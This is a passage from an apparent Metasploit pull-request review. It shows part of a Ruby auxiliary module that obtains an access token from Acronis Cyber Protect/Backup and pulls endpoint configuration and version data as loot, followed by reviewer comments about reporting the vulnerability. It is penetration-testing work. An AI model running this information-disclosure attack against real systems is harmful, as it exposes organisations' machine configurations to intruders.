modules/auxiliary/gather/acronis_cyber_protect_machine_info_disclosure.rb

```diff
@@ -0,0 +1,273 @@
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'idp', 'token'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'vars_post' => {
+        'grant_type' => 'client_credentials',
+        'client_id' => client_id.to_s,
+        'client_secret' => client_secret.to_s
+      }
+    })
+    return unless res&.code == 200
+    return unless res.body.include?('access_token')
+
+    # parse json response and return access_token
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    res_json['access_token']
+  end
+
+  # return all configured items in json format or return nil if not successful
+  def get_machine_info
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'resources'),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Authorization' => "bearer #{@access_token2}"
+      },
+      'vars_get' => {
+        'embed' => 'details'
+      }
+    })
+    return unless res&.code == 200
+    return unless res.body.include?('items') || res.body.include?('data')
+
+    loot_path = store_loot('acronis.cyber.protect.config', 'application/json', datastore['RHOSTS'], res.body, 'configuration', 'endpoint configuration')
+    print_good("Configuration details are successfully saved in json format to #{loot_path}")
+
+    # parse json response and get the relevant machine info
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    res_json
+  end
+
+  # return version information or nil if not successful
+  def get_version_info
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'versions'),
+      'ctype' => 'application/json',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Authorization' => "bearer #{@access_token2}"
+      }
+    })
+    return unless res&.code == 200
+    return unless res.body.include?('backendVersion')
+
+    # parse json response and get the relevant machine info
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    res_json['backendVersion']
+  end
+
+  # return true if the acronis protect/backup api service is running or false if not found
+  def acronis_cyber_service_running?
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'meta'),
+      'ctype' => 'application/json'
+    })
+    return false unless res&.code == 200 && res.body.include?('uri') && res.body.include?('method')
+
+    true
+  end
+
+  def check
+    return Exploit::CheckCode::Detected if acronis_cyber_service_running?
+
+    Exploit::CheckCode::Unknown('Can not determine if the Acronis Cyber Protect or Backup service is running.')
+  end
+
+  def run
```

Comment:
Is it possible to register this as a vulnerable, i.e. via report_vuln / report_web_vuln, so that it persists in the database

Reply:
@adfoster-r7, can you share some examples?
Never used this before....

Reply:
Added `report_web_vuln`. See https://github.com/rapid7/metasploit-framework/pull/19582/commits/2c40621d184e0eff2fefa0ba75eae17109156acc.